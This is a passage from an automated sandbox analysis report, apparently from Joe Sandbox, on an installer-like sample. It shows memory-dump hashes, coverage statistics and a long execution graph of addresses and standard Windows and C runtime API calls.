                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: @ K$DJ$T)K$X/K
                              • API String ID: 0-3815299647
                              • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                              • Instruction ID: 7f74a2b664e077448147c4ef1cfb9b72313e5198c322d7b8c59757b78dcf859e
                              • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                              • Instruction Fuzzy Hash: 0B91157C60430E9BCB00DFA4C850BEF73A2AF4538DF54849ADC656BB81DB35A85AC751
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: D)K$H)K$P)K$T)K
                              • API String ID: 0-2262112463
                              • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                              • Instruction ID: dfe7faed51220c72d1681754efd18784fe7d950f5ba192e50aa6fc4b15bb92c4
                              • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                              • Instruction Fuzzy Hash: 2A51CF7090420EABCF01DF94D880AEFB7B1AF0535CF54452AFC15B7A80DB75A969CBA1

                              Execution Graph

                              Execution Coverage:4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0.4%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:31
execution_graph
6c2a61 malloc _CxxThrowException free _CxxThrowException memcpy 76271->76402 76272->76271 76401 6c2e04 62 API calls 2 library calls 76272->76401 76273->76261 76410 6b3563 memmove 76273->76410 76403 6b4eec 16 API calls 76274->76403 76275->76258 76414 6d1d73 5 API calls __EH_prolog 76275->76414 76276 6c2811 _CxxThrowException 76276->76277 76277->76262 76278 6c2847 76277->76278 76412 6d1d73 5 API calls __EH_prolog 76277->76412 76278->76262 76413 6d1d73 5 API calls __EH_prolog 76278->76413 76285 6c25ad 76404 6d1b07 49 API calls 76285->76404 76286 6c28c0 _CxxThrowException 76286->76230 76287 6c2839 _CxxThrowException 76287->76278 76290 6c2872 _CxxThrowException 76290->76262 76291 6c25b4 76405 6b4ea1 8 API calls 76291->76405 76293 6c25bb 76294 6b2fec 3 API calls 76293->76294 76296 6c25d6 76293->76296 76294->76296 76295 6c261f 76295->76258 76298 6b2fec 3 API calls 76295->76298 76296->76258 76296->76295 76406 6d1d73 5 API calls __EH_prolog 76296->76406 76300 6c263f 76298->76300 76299 6c2611 _CxxThrowException 76299->76295 76407 6b859e malloc _CxxThrowException free _CxxThrowException 76300->76407 76303 6d7b52 __EH_prolog 76302->76303 76427 6d7eec 76303->76427 76305 6d7b63 76307 6d7ca4 76305->76307 76308 6b2e04 malloc _CxxThrowException 76305->76308 76309 6b30ea malloc _CxxThrowException free 76305->76309 76311 6b1e40 free ctype 76305->76311 76313 6f04d2 5 API calls 76305->76313 76316 6b429a 3 API calls 76305->76316 76317 6d7c61 memcpy 76305->76317 76432 6d70ea 76305->76432 76435 6d7a40 76305->76435 76453 6d7cc3 6 API calls 76305->76453 76454 6c12a5 76305->76454 76459 6d74eb malloc _CxxThrowException memcpy __EH_prolog ctype 76305->76459 76460 6d7193 76305->76460 76307->76103 76308->76305 76309->76305 76311->76305 76313->76305 76316->76305 76317->76305 76319->76105 76320->76111 76321->76110 76322->76120 76323->76120 76324->76120 76325->76117 76326->76121 76327->76170 76328->76170 76329->76170 76330->76170 76331->76170 76332->76170 76333->76170 76334->76126 76335->76162 
76336->76162 76337->76162 76338->76162 76339->76162 76340->76131 76341->76149 76342->76149 76343->76149 76344->76149 76345->76149 76346->76137 76347->76143 76348->76147 76349->76156 76350->76166 76351->76171 76352->76174 76353->76179 76355 6b2f1c 2 API calls 76354->76355 76358 6c29fe 76355->76358 76357 6c1f7e 76357->76188 76387 6d1d73 5 API calls __EH_prolog 76357->76387 76418 6b1e40 free 76358->76418 76360 6c2ab3 __EH_prolog 76359->76360 76361 6b2e8a 2 API calls 76360->76361 76371 6c2b0f 76360->76371 76362 6c2af4 76361->76362 76419 6c2a61 malloc _CxxThrowException free _CxxThrowException memcpy 76362->76419 76363 6c22ad 76363->76218 76363->76221 76365 6c2bc6 76425 6d1d73 5 API calls __EH_prolog 76365->76425 76366 6c2b04 76420 6b1e40 free 76366->76420 76369 6c2bd6 _CxxThrowException 76369->76363 76371->76363 76371->76365 76374 6c2b9f 76371->76374 76421 6c2cb4 48 API calls 2 library calls 76371->76421 76422 6c2bf5 8 API calls __EH_prolog 76371->76422 76423 6c2a61 malloc _CxxThrowException free _CxxThrowException memcpy 76371->76423 76374->76363 76424 6d1d73 5 API calls __EH_prolog 76374->76424 76376 6c2bb8 _CxxThrowException 76376->76365 76378 6c3856 __EH_prolog 76377->76378 76379 6b2e04 malloc _CxxThrowException 76378->76379 76380 6b2fec 3 API calls 76378->76380 76381 6b2f88 3 API calls 76378->76381 76382 6f04d2 5 API calls 76378->76382 76384 6b1e40 free ctype 76378->76384 76385 6c3917 76378->76385 76426 6c3b76 malloc _CxxThrowException __EH_prolog ctype 76378->76426 76379->76378 76380->76378 76381->76378 76382->76378 76384->76378 76385->76229 76386->76186 76387->76192 76388->76199 76389->76201 76390->76204 76391->76205 76392->76213 76393->76210 76394->76219 76395->76227 76396->76265 76397->76265 76398->76267 76399->76260 76400->76272 76401->76271 76402->76274 76403->76285 76404->76291 76405->76293 76406->76299 76407->76258 76408->76242 76409->76238 76410->76261 76411->76276 76412->76287 76413->76290 76414->76286 76415->76256 76416->76244 76417->76251 76418->76357 
76419->76366 76420->76371 76421->76371 76422->76371 76423->76371 76424->76376 76425->76369 76426->76378 76428 6d7f14 76427->76428 76431 6d7ef7 76427->76431 76428->76305 76429 6d7193 free 76429->76431 76431->76428 76431->76429 76468 6b1e40 free 76431->76468 76433 6b2e04 2 API calls 76432->76433 76434 6d7103 76433->76434 76434->76305 76436 6d7a4a __EH_prolog 76435->76436 76469 6b361b 6 API calls 2 library calls 76436->76469 76438 6d7a78 76470 6b361b 6 API calls 2 library calls 76438->76470 76440 6d7b20 76472 6e2db9 free ctype 76440->76472 76442 6b2e04 malloc _CxxThrowException 76452 6d7a83 76442->76452 76443 6d7b2b 76473 6e2db9 free ctype 76443->76473 76445 6d7b37 76445->76305 76446 6b2fec 3 API calls 76446->76452 76447 6f04d2 5 API calls 76447->76452 76448 6b2fec 3 API calls 76449 6d7aca wcscmp 76448->76449 76449->76452 76451 6b1e40 free ctype 76451->76452 76452->76440 76452->76442 76452->76446 76452->76447 76452->76448 76452->76451 76471 6d7955 malloc _CxxThrowException __EH_prolog ctype 76452->76471 76453->76305 76455 6f04d2 5 API calls 76454->76455 76456 6c12ad 76455->76456 76457 6b1e0c ctype 2 API calls 76456->76457 76458 6c12b4 76457->76458 76458->76305 76459->76305 76461 6d719d __EH_prolog 76460->76461 76474 6e2db9 free ctype 76461->76474 76463 6d71b3 76475 6d71d5 free __EH_prolog ctype 76463->76475 76465 6d71bf 76476 6b1e40 free 76465->76476 76467 6d71c7 76467->76305 76468->76431 76469->76438 76470->76452 76471->76452 76472->76443 76473->76445 76474->76463 76475->76465 76476->76467 76477 747da0 WaitForSingleObject 76478 747dc1 76477->76478 76479 747dbb GetLastError 76477->76479 76480 747dce CloseHandle 76478->76480 76481 747ddf 76478->76481 76479->76478 76480->76481 76482 747dd9 GetLastError 76480->76482 76482->76481 76483 6dcefb 76484 6dd0cc 76483->76484 76485 6dcf03 76483->76485 76485->76484 76530 6dcae9 VariantClear 76485->76530 76487 6dcf59 76487->76484 76531 6dcae9 VariantClear 76487->76531 76489 6dcf71 76489->76484 76532 6dcae9 VariantClear 76489->76532 
76491 6dcf87 76491->76484 76533 6dcae9 VariantClear 76491->76533 76493 6dcf9d 76493->76484 76534 6dcae9 VariantClear 76493->76534 76495 6dcfb3 76495->76484 76535 6dcae9 VariantClear 76495->76535 76497 6dcfc9 76497->76484 76536 6b4504 malloc _CxxThrowException 76497->76536 76499 6dcfdc 76500 6b2e04 2 API calls 76499->76500 76502 6dcfe7 76500->76502 76501 6dd009 76504 6dd080 76501->76504 76505 6dd030 76501->76505 76529 6dd07b 76501->76529 76502->76501 76503 6b2f88 3 API calls 76502->76503 76503->76501 76541 6d7a0c CharUpperW 76504->76541 76508 6b2e04 2 API calls 76505->76508 76511 6dd038 76508->76511 76509 6dd0c4 76545 6b1e40 free 76509->76545 76510 6dd08b 76542 6cfdbc 4 API calls 2 library calls 76510->76542 76513 6b2e04 2 API calls 76511->76513 76515 6dd046 76513->76515 76537 6cfdbc 4 API calls 2 library calls 76515->76537 76516 6dd0a7 76518 6b2fec 3 API calls 76516->76518 76520 6dd0b3 76518->76520 76519 6dd057 76521 6b2fec 3 API calls 76519->76521 76543 6b1e40 free 76520->76543 76523 6dd063 76521->76523 76538 6b1e40 free 76523->76538 76525 6dd06b 76539 6b1e40 free 76525->76539 76527 6dd073 76540 6b1e40 free 76527->76540 76544 6b1e40 free 76529->76544 76530->76487 76531->76489 76532->76491 76533->76493 76534->76495 76535->76497 76536->76499 76537->76519 76538->76525 76539->76527 76540->76529 76541->76510 76542->76516 76543->76529 76544->76509 76545->76484 76546 6bc3bd 76547 6bc3db 76546->76547 76548 6bc3ca 76546->76548 76548->76547 76550 6b1e40 free 76548->76550 76550->76547 76551 6eadb7 76552 6eadc1 __EH_prolog 76551->76552 76553 6b26dd 2 API calls 76552->76553 76554 6eae1d 76553->76554 76555 6b2e04 2 API calls 76554->76555 76556 6eae38 76555->76556 76557 6b2e04 2 API calls 76556->76557 76558 6eae44 76557->76558 76559 6b2e04 2 API calls 76558->76559 76560 6eae68 76559->76560 76561 6ead29 2 API calls 76560->76561 76562 6eae85 76561->76562 76567 6eaf2d 76562->76567 76564 6eae94 76565 6b2e04 2 API calls 76564->76565 76566 6eaeb2 76565->76566 76568 6eaf37 __EH_prolog 
76567->76568 76579 6c34f4 malloc _CxxThrowException __EH_prolog 76568->76579 76570 6eafac 76571 6b2e04 2 API calls 76570->76571 76572 6eafbb 76571->76572 76573 6b2e04 2 API calls 76572->76573 76574 6eafca 76573->76574 76575 6b2e04 2 API calls 76574->76575 76576 6eafd9 76575->76576 76577 6b2e04 2 API calls 76576->76577 76578 6eafe8 76577->76578 76578->76564 76579->76570 76580 6e5475 76581 6b2fec 3 API calls 76580->76581 76582 6e54b4 76581->76582 76583 6ec911 24 API calls 76582->76583 76584 6e54bb 76583->76584 76585 6f8eb1 76590 6f8ed1 76585->76590 76587 6f8ec9 76591 6f8edb __EH_prolog 76590->76591 76599 6f9267 76591->76599 76595 6f8efd 76604 6ee5f1 free ctype 76595->76604 76597 6f8eb9 76597->76587 76598 6b1e40 free 76597->76598 76598->76587 76600 6f9271 __EH_prolog 76599->76600 76605 6b1e40 free 76600->76605 76602 6f8ef1 76603 6f922b free CloseHandle GetLastError ctype 76602->76603 76603->76595 76604->76597 76605->76602 76606 72f190 76607 6b1e0c ctype 2 API calls 76606->76607 76608 72f1b0 76607->76608 76610 7369d0 76611 7369d7 malloc 76610->76611 76612 7369d4 76610->76612 76613 6dd948 76643 6ddac7 76613->76643 76615 6dd94f 76616 6b2e04 2 API calls 76615->76616 76617 6dd97b 76616->76617 76618 6b2e04 2 API calls 76617->76618 76619 6dd987 76618->76619 76622 6dd9e7 76619->76622 76651 6b6404 76619->76651 76624 6dda0f 76622->76624 76625 6dda36 76622->76625 76676 6b1e40 free 76624->76676 76627 6dda94 76625->76627 76635 6b2da9 2 API calls 76625->76635 76640 6f04d2 5 API calls 76625->76640 76678 6b1524 malloc _CxxThrowException __EH_prolog ctype 76625->76678 76679 6b1e40 free 76625->76679 76680 6b1e40 free 76627->76680 76629 6dd9bf 76674 6b1e40 free 76629->76674 76631 6dda17 76677 6b1e40 free 76631->76677 76633 6dd9c7 76675 6b1e40 free 76633->76675 76634 6dda9c 76681 6b1e40 free 76634->76681 76635->76625 76639 6dd9cf 76640->76625 76644 6ddad1 __EH_prolog 76643->76644 76645 6b2e04 2 API calls 76644->76645 76646 6ddb33 76645->76646 76647 6b2e04 2 API calls 76646->76647 76648 
6ddb3f 76647->76648 76649 6b2e04 2 API calls 76648->76649 76650 6ddb55 76649->76650 76650->76615 76652 6b631f 9 API calls 76651->76652 76653 6b6414 76652->76653 76654 6b6423 76653->76654 76655 6b2f88 3 API calls 76653->76655 76656 6b2f88 3 API calls 76654->76656 76655->76654 76657 6b643d 76656->76657 76658 6c7e5a 76657->76658 76659 6c7e64 __EH_prolog 76658->76659 76682 6c8179 76659->76682 76662 6d7ebb free 76663 6c7e7f 76662->76663 76664 6b2fec 3 API calls 76663->76664 76665 6c7e9a 76664->76665 76666 6b2da9 2 API calls 76665->76666 76667 6c7ea7 76666->76667 76668 6b6c72 44 API calls 76667->76668 76669 6c7eb7 76668->76669 76687 6b1e40 free 76669->76687 76671 6c7ecb 76672 6c7ed8 76671->76672 76688 6b757d GetLastError 76671->76688 76672->76622 76672->76629 76674->76633 76675->76639 76676->76631 76677->76639 76678->76625 76679->76625 76680->76634 76681->76639 76686 6c8906 76682->76686 76683 6c7e77 76683->76662 76686->76683 76689 6c8804 free ctype 76686->76689 76690 6b1e40 free 76686->76690 76687->76671 76688->76672 76689->76686 76690->76686 76691 6da7c5 76699 6da96b 76691->76699 76709 6da7e9 76691->76709 76692 6dade3 76796 6b1e40 free 76692->76796 76694 6da952 76694->76699 76777 6de0b0 6 API calls 76694->76777 76695 6dadeb 76797 6b1e40 free 76695->76797 76699->76692 76700 6dac1e 76699->76700 76726 6dac6c 76699->76726 76738 6dad88 76699->76738 76743 6dad17 76699->76743 76744 6dacbc 76699->76744 76758 6c101c 76699->76758 76761 6d98f2 76699->76761 76767 6dcc6f 76699->76767 76778 6d9531 5 API calls __EH_prolog 76699->76778 76779 6d80c1 malloc _CxxThrowException __EH_prolog 76699->76779 76780 6dc820 5 API calls 2 library calls 76699->76780 76781 6d814d 6 API calls 76699->76781 76782 6d8125 free ctype 76699->76782 76783 6b1e40 free 76700->76783 76701 6dae99 76704 6b1e0c ctype 2 API calls 76701->76704 76707 6daea9 memset memset 76704->76707 76705 6dac26 76784 6b1e40 free 76705->76784 76706 6dadf3 76706->76701 76712 6f04d2 malloc _CxxThrowException free _CxxThrowException 
memcpy 76706->76712 76710 6daedd 76707->76710 76709->76694 76717 6f04d2 5 API calls 76709->76717 76776 6de0b0 6 API calls 76709->76776 76798 6b1e40 free 76710->76798 76712->76706 76713 6daee5 76799 6b1e40 free 76713->76799 76717->76709 76718 6daef0 76800 6b1e40 free 76718->76800 76719 6dac2e 76801 6b1e40 free 76719->76801 76723 6dc430 76802 6b1e40 free 76723->76802 76725 6dc438 76803 6b1e40 free 76725->76803 76785 6b1e40 free 76726->76785 76730 6dc443 76804 6b1e40 free 76730->76804 76731 6dac85 76786 6b1e40 free 76731->76786 76734 6dc44e 76805 6b1e40 free 76734->76805 76736 6dc459 76793 6d8125 free ctype 76738->76793 76742 6dad93 76794 6b1e40 free 76742->76794 76790 6d8125 free ctype 76743->76790 76787 6d8125 free ctype 76744->76787 76748 6dad3c 76791 6b1e40 free 76748->76791 76749 6dadac 76795 6b1e40 free 76749->76795 76750 6dacc7 76788 6b1e40 free 76750->76788 76754 6dace0 76789 6b1e40 free 76754->76789 76755 6dad55 76792 6b1e40 free 76755->76792 76760 6bb95a 6 API calls 76758->76760 76759 6c1028 76759->76699 76760->76759 76762 6d98fc __EH_prolog 76761->76762 76806 6d9987 76762->76806 76764 6d9970 76764->76699 76766 6d9911 76766->76764 76810 6def8d 12 API calls 2 library calls 76766->76810 76850 6f5505 76767->76850 76854 6ff445 76767->76854 76860 6fcf91 76767->76860 76768 6dcc8b 76772 6dcccb 76768->76772 76868 6d979e VariantClear __EH_prolog 76768->76868 76770 6dccb1 76770->76772 76869 6dcae9 VariantClear 76770->76869 76772->76699 76776->76709 76777->76699 76778->76699 76779->76699 76780->76699 76781->76699 76782->76699 76783->76705 76784->76719 76785->76731 76786->76719 76787->76750 76788->76754 76789->76719 76790->76748 76791->76755 76792->76719 76793->76742 76794->76749 76795->76719 76796->76695 76797->76706 76798->76713 76799->76718 76800->76719 76801->76723 76802->76725 76803->76730 76804->76734 76805->76736 76807 6d9991 __EH_prolog 76806->76807 76811 7080aa 76807->76811 76808 6d99a8 76808->76766 76810->76764 76812 7080b4 __EH_prolog 76811->76812 76813 
6b1e0c ctype 2 API calls 76812->76813 76814 7080bf 76813->76814 76815 7080d3 76814->76815 76817 6fbdb5 76814->76817 76815->76808 76818 6fbdbf __EH_prolog 76817->76818 76823 6fbe69 76818->76823 76820 6fbdef 76821 6b2e04 2 API calls 76820->76821 76822 6fbe16 76821->76822 76822->76815 76824 6fbe73 __EH_prolog 76823->76824 76827 6f5e2b 76824->76827 76826 6fbe7f 76826->76820 76828 6f5e35 __EH_prolog 76827->76828 76833 6f08b6 76828->76833 76830 6f5e41 76838 6cdfc9 malloc _CxxThrowException __EH_prolog 76830->76838 76832 6f5e57 76832->76826 76839 6b9c60 76833->76839 76835 6f08c4 76844 6b9c8f GetModuleHandleA GetProcAddress 76835->76844 76837 6f08f3 __aulldiv 76837->76830 76838->76832 76849 6b9c4d GetCurrentProcess GetProcessAffinityMask 76839->76849 76841 6b9c6e 76842 6b9c80 GetSystemInfo 76841->76842 76843 6b9c79 76841->76843 76842->76835 76843->76835 76845 6b9cef GlobalMemoryStatus 76844->76845 76846 6b9cc4 GlobalMemoryStatusEx 76844->76846 76847 6b9d08 76845->76847 76846->76845 76848 6b9cce 76846->76848 76847->76848 76848->76837 76849->76841 76851 6f550f __EH_prolog 76850->76851 76870 6f4e8a 76851->76870 76855 6ff455 76854->76855 77086 6c1092 76855->77086 76859 6ff478 76859->76768 76861 6fcf9b __EH_prolog 76860->76861 76862 6ff445 14 API calls 76861->76862 76863 6fd018 76862->76863 76867 6fd01f 76863->76867 77102 701511 76863->77102 76865 6fd08b 76865->76867 77108 702c5d 11 API calls 2 library calls 76865->77108 76867->76768 76868->76770 76869->76772 76871 6f4e94 __EH_prolog 76870->76871 76872 6b2e04 2 API calls 76871->76872 76975 6f4f1d 76871->76975 76873 6f4ed7 76872->76873 77002 6c7fc5 76873->77002 76875 6f4f0a 76877 6b965d VariantClear 76875->76877 76876 6f4f37 76878 6f4f63 76876->76878 76879 6f4f41 76876->76879 76881 6f4f15 76877->76881 76880 6b2f88 3 API calls 76878->76880 76882 6b965d VariantClear 76879->76882 76883 6f4f71 76880->76883 77023 6b1e40 free 76881->77023 76885 6f4f4c 76882->76885 76886 6b965d VariantClear 76883->76886 77024 6b1e40 free 76885->77024 
76888 6f4f80 76886->76888 77025 6c5bcf malloc _CxxThrowException 76888->77025 76890 6f4f9a 76891 6b2e47 2 API calls 76890->76891 76892 6f4fad 76891->76892 76893 6b2f1c 2 API calls 76892->76893 76894 6f4fbd 76893->76894 76895 6b2e04 2 API calls 76894->76895 76896 6f4fd1 76895->76896 76897 6b2e04 2 API calls 76896->76897 76904 6f4fdd 76897->76904 76898 6f5404 77064 6b1e40 free 76898->77064 76900 6f540c 77065 6b1e40 free 76900->77065 76902 6f5414 77066 6b1e40 free 76902->77066 76904->76898 77026 6c5bcf malloc _CxxThrowException 76904->77026 76906 6f5099 76908 6b2da9 2 API calls 76906->76908 76907 6f541c 77067 6b1e40 free 76907->77067 76910 6f50a9 76908->76910 76912 6b2fec 3 API calls 76910->76912 76911 6f5424 77068 6b1e40 free 76911->77068 76914 6f50b6 76912->76914 77027 6b1e40 free 76914->77027 76915 6f542c 77069 6b1e40 free 76915->77069 76918 6f50be 77028 6b1e40 free 76918->77028 76920 6f50cd 76921 6b2f88 3 API calls 76920->76921 76922 6f50e3 76921->76922 76923 6f50f1 76922->76923 76924 6f5100 76922->76924 76925 6b30ea 3 API calls 76923->76925 77029 6b3044 malloc _CxxThrowException free ctype 76924->77029 76927 6f50fe 76925->76927 77030 6c1029 6 API calls 76927->77030 76929 6f511a 76930 6f516b 76929->76930 76931 6f5120 76929->76931 77037 6c089e malloc _CxxThrowException free _CxxThrowException memcpy 76930->77037 77031 6b1e40 free 76931->77031 76934 6f5187 76938 6f04d2 5 API calls 76934->76938 76935 6f5128 77032 6b1e40 free 76935->77032 76937 6f5130 77033 6b1e40 free 76937->77033 76940 6f51ba 76938->76940 77038 6f0516 malloc _CxxThrowException ctype 76940->77038 76941 6f5138 77034 6b1e40 free 76941->77034 76944 6f51c5 76949 6f522d 76944->76949 76950 6f51f5 76944->76950 76945 6f5140 77035 6b1e40 free 76945->77035 76947 6f5148 77036 6b1e40 free 76947->77036 76951 6b2e04 2 API calls 76949->76951 77039 6b1e40 free 76950->77039 76999 6f5235 76951->76999 76953 6f51fd 77040 6b1e40 free 76953->77040 76956 6f5205 77041 6b1e40 free 76956->77041 76958 6f532e 77050 6b1e40 free 
76958->77050 76959 6f520d 77042 6b1e40 free 76959->77042 76962 6f5347 76962->76898 76964 6f5358 76962->76964 76963 6f5215 77043 6b1e40 free 76963->77043 77051 6b1e40 free 76964->77051 76965 6f53a3 77057 6b1e40 free 76965->77057 76968 6f521d 77044 6b1e40 free 76968->77044 76969 6f5360 77052 6b1e40 free 76969->77052 76973 6f5368 77053 6b1e40 free 76973->77053 76975->76768 76977 6f53bc 77058 6b1e40 free 76977->77058 76978 6f5370 77054 6b1e40 free 76978->77054 76982 6f53c4 77059 6b1e40 free 76982->77059 76983 6f5378 77055 6b1e40 free 76983->77055 76985 6f04d2 5 API calls 76985->76999 76987 6f53cc 77060 6b1e40 free 76987->77060 76988 6f5380 77056 6b1e40 free 76988->77056 76992 6f53d4 77061 6b1e40 free 76992->77061 76994 6f53dc 77062 6b1e40 free 76994->77062 76996 6f53e4 77063 6b1e40 free 76996->77063 76999->76958 76999->76965 76999->76985 77000 6b2e04 2 API calls 76999->77000 77045 6f545c 5 API calls 2 library calls 76999->77045 77046 6c1029 6 API calls 76999->77046 77047 6c089e malloc _CxxThrowException free _CxxThrowException memcpy 76999->77047 77048 6f0516 malloc _CxxThrowException ctype 76999->77048 77049 6b1e40 free 76999->77049 77000->76999 77003 6c7fcf __EH_prolog 77002->77003 77004 6c8061 77003->77004 77006 6c805c 77003->77006 77007 6c8019 77003->77007 77011 6c7ff4 77003->77011 77004->77006 77018 6c8025 77004->77018 77078 6b9630 VariantClear 77006->77078 77010 6c801e 77007->77010 77007->77011 77009 6c80b8 77013 6b965d VariantClear 77009->77013 77014 6c8042 77010->77014 77015 6c8022 77010->77015 77020 6c800a 77011->77020 77070 6b950d 77011->77070 77017 6c80c0 77013->77017 77076 6b9597 VariantClear 77014->77076 77015->77018 77019 6c8032 77015->77019 77017->76875 77017->76876 77018->77020 77077 6b95df VariantClear 77018->77077 77075 6b9604 VariantClear 77019->77075 77079 6b9736 VariantClear 77020->77079 77023->76975 77024->76975 77025->76890 77026->76906 77027->76918 77028->76920 77029->76927 77030->76929 77031->76935 77032->76937 77033->76941 77034->76945 
77035->76947 77036->76975 77037->76934 77038->76944 77039->76953 77040->76956 77041->76959 77042->76963 77043->76968 77044->76975 77045->76999 77046->76999 77047->76999 77048->76999 77049->76999 77050->76962 77051->76969 77052->76973 77053->76978 77054->76983 77055->76988 77056->76975 77057->76977 77058->76982 77059->76987 77060->76992 77061->76994 77062->76996 77063->76975 77064->76900 77065->76902 77066->76907 77067->76911 77068->76915 77069->76975 77080 6b9767 77070->77080 77072 6b9518 SysAllocStringLen 77073 6b9539 _CxxThrowException 77072->77073 77074 6b954f 77072->77074 77073->77074 77074->77020 77075->77020 77076->77020 77077->77020 77078->77020 77079->77009 77081 6b9779 77080->77081 77082 6b9770 77080->77082 77085 6b9686 VariantClear 77081->77085 77082->77072 77084 6b9780 77084->77072 77085->77084 77088 6bb95a 6 API calls 77086->77088 77087 6c10aa 77087->76859 77089 6ff1b2 77087->77089 77088->77087 77090 6ff1bc __EH_prolog 77089->77090 77099 6c1168 77090->77099 77092 6ff1e6 77092->76859 77093 6ff1d3 77093->77092 77094 6ff21c _CxxThrowException 77093->77094 77095 6ff231 memcpy 77093->77095 77094->77095 77098 6ff24c 77095->77098 77096 6ff2f0 memmove 77096->77098 77097 6ff31a memcpy 77097->77092 77098->77092 77098->77096 77098->77097 77100 6c111c 10 API calls 77099->77100 77101 6c117b 77100->77101 77101->77093 77103 70151b __EH_prolog 77102->77103 77109 7010d3 77103->77109 77106 701552 _CxxThrowException 77106->76865 77107 701589 77107->76865 77108->76867 77110 7010dd __EH_prolog 77109->77110 77111 6fd1b7 free 77110->77111 77112 7010f2 77111->77112 77113 7012ef 77112->77113 77114 7011f4 77112->77114 77118 6c1168 10 API calls 77112->77118 77113->77106 77113->77107 77114->77113 77140 6bb95a 6 API calls 77114->77140 77115 70139e 77115->77113 77116 7013c4 77115->77116 77119 6b1e0c ctype 2 API calls 77115->77119 77117 6c1168 10 API calls 77116->77117 77121 7013da 77117->77121 77118->77114 77119->77116 77120 7013de 77182 6b1e40 free 77120->77182 77121->77120 77124 
7013f9 77121->77124 77176 6fef67 _CxxThrowException 77121->77176 77141 6ff047 77124->77141 77127 7014ba 77180 700943 50 API calls 2 library calls 77127->77180 77128 701450 77145 7006ae 77128->77145 77132 7014e7 77181 6e2db9 free ctype 77132->77181 77136 70148e 77137 6ff047 _CxxThrowException 77136->77137 77138 7014ac 77137->77138 77138->77127 77179 6fef67 _CxxThrowException 77138->77179 77140->77115 77142 6ff063 77141->77142 77143 6ff072 77142->77143 77183 6fef67 _CxxThrowException 77142->77183 77143->77127 77143->77128 77177 6fef67 _CxxThrowException 77143->77177 77146 7006b8 __EH_prolog 77145->77146 77184 7003f4 77146->77184 77148 700877 77150 6fb8dc ctype free 77148->77150 77149 6c12a5 5 API calls 77175 700715 77149->77175 77151 7008a6 77150->77151 77214 6b1e40 free 77151->77214 77152 7008e3 _CxxThrowException 77154 7008f7 77152->77154 77158 6fb8dc ctype free 77154->77158 77155 7008ae 77215 6b1e40 free 77155->77215 77156 6b429a 3 API calls 77156->77175 77160 700914 77158->77160 77159 7008b6 77216 6b1e40 free 77159->77216 77218 6b1e40 free 77160->77218 77161 6b1e0c ctype 2 API calls 77161->77175 77164 7008be 77217 6fc149 free ctype 77164->77217 77165 70091c 77219 6b1e40 free 77165->77219 77167 7008d0 77167->77132 77167->77136 77178 6fef67 _CxxThrowException 77167->77178 77169 700924 77220 6b1e40 free 77169->77220 77170 6f81ec 29 API calls 77170->77175 77172 70092c 77221 6fc149 free ctype 77172->77221 77174 6fef67 _CxxThrowException 77174->77175 77175->77148 77175->77149 77175->77152 77175->77154 77175->77156 77175->77161 77175->77170 77175->77174 77176->77124 77177->77128 77178->77136 77179->77127 77180->77132 77181->77120 77182->77113 77183->77143 77185 6ff047 _CxxThrowException 77184->77185 77186 700407 77185->77186 77187 6ff047 _CxxThrowException 77186->77187 77188 700475 77186->77188 77190 700421 77187->77190 77192 70049a 77188->77192 77225 6ffa3f 22 API calls 2 library calls 77188->77225 77189 7004e8 77228 707c4a malloc _CxxThrowException free ctype 
77189->77228 77194 70043e 77190->77194 77222 6fef67 _CxxThrowException 77190->77222 77201 7004b8 77192->77201 77226 70159a malloc _CxxThrowException free ctype 77192->77226 77193 7004cd 77227 6ffff0 9 API calls 2 library calls 77193->77227 77223 6ff93c 7 API calls 2 library calls 77194->77223 77196 700492 77199 6ff047 _CxxThrowException 77196->77199 77199->77192 77201->77189 77201->77193 77202 7004db 77206 6ff047 _CxxThrowException 77202->77206 77204 7004e3 77208 70054a 77204->77208 77230 6fef67 _CxxThrowException 77204->77230 77205 700446 77207 70046d 77205->77207 77224 6fef67 _CxxThrowException 77205->77224 77206->77204 77209 6ff047 _CxxThrowException 77207->77209 77208->77175 77209->77188 77211 7004f3 77211->77204 77229 6c089e malloc _CxxThrowException free _CxxThrowException memcpy 77211->77229 77214->77155 77215->77159 77216->77164 77217->77167 77218->77165 77219->77169 77220->77172 77221->77167 77222->77194 77223->77205 77224->77207 77225->77196 77226->77201 77227->77202 77228->77211 77229->77211 77230->77208 77231 6f0343 77236 6f035f 77231->77236 77235 6f0358 77237 6f0369 __EH_prolog 77236->77237 77253 6c139e 77237->77253 77242 6f0143 ctype free 77243 6f039a 77242->77243 77263 6b1e40 free 77243->77263 77245 6f03a2 77264 6b1e40 free 77245->77264 77247 6f03aa 77265 6f03d8 77247->77265 77252 6b1e40 free 77252->77235 77254 6c13ae 77253->77254 77255 6c13b3 77253->77255 77281 747ea0 SetEvent GetLastError 77254->77281 77257 6f01c4 77255->77257 77262 6f01ce __EH_prolog 77257->77262 77258 6f0203 77282 6b1e40 free 77258->77282 77260 6f020b 77260->77242 77262->77258 77283 6b1e40 free 77262->77283 77263->77245 77264->77247 77266 6f03e2 __EH_prolog 77265->77266 77267 6c139e ctype 2 API calls 77266->77267 77268 6f03fb 77267->77268 77284 747d50 77268->77284 77270 6f0403 77271 747d50 ctype 2 API calls 77270->77271 77272 6f040b 77271->77272 77273 747d50 ctype 2 API calls 77272->77273 77274 6f03b7 77273->77274 77275 6f004a 77274->77275 77276 